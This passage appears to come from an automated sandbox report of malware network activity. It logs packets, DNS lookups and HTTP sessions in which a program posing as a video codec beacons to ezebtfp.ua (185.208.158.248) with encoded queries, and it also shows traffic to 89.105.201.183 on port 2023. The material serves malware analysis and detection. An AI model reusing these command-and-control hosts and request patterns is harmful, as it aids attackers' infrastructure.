                                                                                                    Oct 3, 2024 08:40:55.362102985 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:55.366884947 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.045413017 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.045579910 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.154511929 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.159980059 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.394747972 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.394949913 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.512135029 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.512454987 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.517508984 CEST8049769185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.517606020 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.517759085 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.517770052 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.517819881 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.522623062 CEST8049769185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.905188084 CEST20234971489.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.915585041 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:56.920490980 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.920579910 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:56.928678036 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:56.933613062 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.933706999 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:56.938606024 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.947262049 CEST497142023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:57.227519989 CEST8049769185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.227685928 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.373248100 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.373608112 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.380122900 CEST8049772185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.380229950 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.380521059 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.381380081 CEST8049769185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.381444931 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.385370016 CEST8049772185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.749028921 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.790980101 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:58.064780951 CEST8049772185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.064857006 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.184329987 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.184695005 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.189744949 CEST8049772185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.189815998 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.189852953 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.189918041 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.190072060 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.194876909 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.315911055 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:58.320884943 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.320924044 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.320961952 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.321074963 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.086555958 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.087090969 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.087367058 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.088099957 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.088176966 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.088196039 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:59.093374968 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.215570927 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.215970039 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.220804930 CEST8049774185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.220916033 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.220988035 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.224005938 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.224080086 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.225820065 CEST8049774185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.476816893 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.525381088 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:59.679896116 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.728660107 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:59.934163094 CEST8049774185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.934413910 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.077588081 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.077903986 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.083300114 CEST8049775185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.083389997 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.083481073 CEST8049774185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.083533049 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.084393978 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.090616941 CEST8049775185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.311049938 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:41:00.311763048 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:41:00.316210032 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.317142963 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.317205906 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:41:00.787364960 CEST8049775185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.787445068 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.921828985 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.922220945 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.934305906 CEST8049776185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.934386969 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.934550047 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.935759068 CEST8049775185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.935823917 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.948292971 CEST8049776185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:01.898088932 CEST8049776185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:01.898164988 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.016957045 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.017498016 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.022557020 CEST8049776185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.022579908 CEST8049777185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.022649050 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.022716045 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.022850990 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.028131008 CEST8049777185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.735198975 CEST8049777185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.736191034 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.898607969 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.899442911 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.905047894 CEST8049777185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.905107975 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.905320883 CEST8049778185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.905381918 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.920604944 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.925570965 CEST8049778185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:03.596120119 CEST8049778185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:03.596214056 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.718857050 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.719202042 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.724497080 CEST8049779185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:03.724584103 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.724586964 CEST8049778185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:03.724658012 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.724756002 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.730065107 CEST8049779185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:04.426274061 CEST8049779185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:04.426341057 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.546231031 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.546617031 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.562465906 CEST8049780185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:04.562596083 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.562705040 CEST8049779185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:04.562783003 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.562844038 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.583483934 CEST8049780185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:05.350626945 CEST8049780185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:05.350713015 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.469022036 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.469666004 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.678822994 CEST8049781185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:05.678913116 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.678982973 CEST8049780185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:05.679094076 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.683391094 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.688621998 CEST8049781185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:07.092375040 CEST8049781185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:07.092387915 CEST8049781185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:07.092510939 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:07.094438076 CEST8049781185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:07.094526052 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:07.202946901 CEST4978280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:07.202946901 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:07.214256048 CEST8049782185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:07.215253115 CEST8049781185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:07.215375900 CEST4978280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:07.215375900 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:07.215607882 CEST4978280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:07.221390009 CEST8049782185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:07.965732098 CEST8049782185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:07.965780020 CEST4978280192.168.2.5185.208.158.248

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 3, 2024 08:39:57.002897978 CEST5883653192.168.2.5141.98.234.31
                                                                                                    Oct 3, 2024 08:39:57.241374016 CEST5358836141.98.234.31192.168.2.5
                                                                                                    Oct 3, 2024 08:40:50.386327982 CEST5612753192.168.2.51.1.1.1
                                                                                                    Oct 3, 2024 08:40:56.907285929 CEST5325953192.168.2.51.1.1.1

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 3, 2024 08:39:57.002897978 CEST192.168.2.5141.98.234.310xade3Standard query (0)ezebtfp.uaA (IP address)IN (0x0001)false
                                                                                                    Oct 3, 2024 08:40:50.386327982 CEST192.168.2.51.1.1.10xc44dStandard query (0)signup.live.comA (IP address)IN (0x0001)false
                                                                                                    Oct 3, 2024 08:40:56.907285929 CEST192.168.2.51.1.1.10x940cStandard query (0)signup.live.comA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 3, 2024 08:39:57.241374016 CEST141.98.234.31192.168.2.50xade3No error (0)ezebtfp.ua185.208.158.248A (IP address)IN (0x0001)false
                                                                                                    Oct 3, 2024 08:40:50.393599033 CEST1.1.1.1192.168.2.50xc44dNo error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Oct 3, 2024 08:40:56.914307117 CEST1.1.1.1192.168.2.50x940cNo error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • ezebtfp.ua

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.549711185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:39:57.304194927 CEST313OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91 HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:39:57.996258020 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:39:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.549712185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:39:58.200680017 CEST313OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91 HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:39:58.879477024 CEST810INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:39:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 32 35 61 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 30 37 35 34 36 61 62 37 36 65 38 36 36 61 38 33 32 34 62 63 31 66 62 64 30 30 32 63 31 34 33 63 64 37 64 62 62 31 33 66 65 32 64 38 62 32 35 65 35 30 65 61 34 36 36 63 30 34 64 62 61 65 62 34 36 65 37 35 38 37 66 34 33 65 63 32 66 36 36 39 31 33 64 37 39 38 62 66 36 30 66 63 32 65 63 39 36 38 34 33 61 63 64 36 63 39 63 31 37 64 38 35 30 38 66 32 31 62 32 35 63 61 64 65 65 35 39 33 66 65 62 37 63 63 63 66 66 37 61 62 31 38 35 65 63 64 35 34 61 65 36 33 35 63 38 31 31 33 34 34 33 35 38 32 34 65 34 33 62 37 30 30 62 36 35 61 37 65 65 38 66 66 62 38 63 32 63 35 31 65 36 35 63 37 30 32 39 66 63 33 34 35 66 66 37 66 65 66 39 38 64 66 63 33 66 36 35 61 35 65 39 34 32 39 38 38 31 66 62 37 61 32 37 31 [TRUNCATED]
                                                                                                    Data Ascii: 25a67b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592de07546ab76e866a8324bc1fbd002c143cd7dbb13fe2d8b25e50ea466c04dbaeb46e7587f43ec2f66913d798bf60fc2ec96843acd6c9c17d8508f21b25cadee593feb7cccff7ab185ecd54ae635c81134435824e43b700b65a7ee8ffb8c2c51e65c7029fc345ff7fef98dfc3f65a5e9429881fb7a2718bc6fe786c9b27bd56b1b29316ca652cedda6302aa4c80bb01ebba634a6c4cc387e2f0ed33be812f0d3bf0351d33a14da56daf9659d2db79d5da3fcd2a9c42522bb7fa3ef089daabf735aa08cf529a8e084821ef312e14489466fcfb5c1eb890f23f9f6b265f82dd70221fa679060b2df51881eb82756400e998c635e3e596183f9852325657f0
                                                                                                    Oct 3, 2024 08:40:01.512636900 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:01.788605928 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.549715185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:01.909507036 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:02.619884014 CEST666INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 31 63 61 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 63 64 32 65 64 31 63 30 31 65 61 61 32 35 35 66 34 30 32 64 31 66 61 38 31 65 63 39 34 38 37 34 64 38 62 34 66 64 32 66 62 64 66 33 37 33 36 62 39 34 65 66 65 64 31 64 61 31 38 32 38 65 31 37 64 35 61 61 64 37 35 66 36 36 63 61 38 33 37 35 33 64 65 66 62 64 61 31 36 63 32 34 30 63 65 36 33 62 31 31 30 66 63 33 39 38 62 32 36 65 34 31 30 61 64 36 32 63 30 34 64 62 63 65 35 35 30 65 62 35 64 36 31 34 31 65 66 32 63 36 64 39 36 33 62 36 37 38 65 66 34 31 30 63 37 65 65 38 62 39 38 33 66 63 61 37 31 39 34 31 35 64 62 34 65 38 64 32 38 62 33 35 33 62 32 65 39 35 66 32 31 65 36 37 33 64 30 65 33 37 62 62 39 38 64 66 31 64 34 34 63 65 37 32 30 63 38 31 32 33 30 35 37 35 66 32 30 65 33 32 35 37 39 30 39 36 31 62 31 66 32 38 66 66 65 39 38 32 39 35 31 66 38 35 64 37 62 32 39 66 34 32 66 35 64 66 37 66 37 65 65 38 38 65 34 33 66 37 65 61 63 66 33 34 35 39 36 38 32 65 35 37 62 32 30 31 [TRUNCATED]
                                                                                                    Data Ascii: 1ca67b69c953804b26b565fe95b321bd19a55f78cd2ed1c01eaa255f402d1fa81ec94874d8b4fd2fbdf3736b94efed1da1828e17d5aad75f66ca83753defbda16c240ce63b110fc398b26e410ad62c04dbce550eb5d6141ef2c6d963b678ef410c7ee8b983fca719415db4e8d28b353b2e95f21e673d0e37bb98df1d44ce720c81230575f20e325790961b1f28ffe982951f85d7b29f42f5df7f7ee88e43f7eacf3459682e57b201bb76def98c0b164cf69042c2f65a950d0deac3328bac90eb303b8bc30b9c1d531712d10d132ed19edd1be0744d33716da54dff27d9b2ea99f54a1e2d0a8f00
                                                                                                    Oct 3, 2024 08:40:02.730813026 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:03.096632004 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.549717185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:03.222007036 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:03.912508011 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.549718185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:04.148631096 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:04.832319975 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


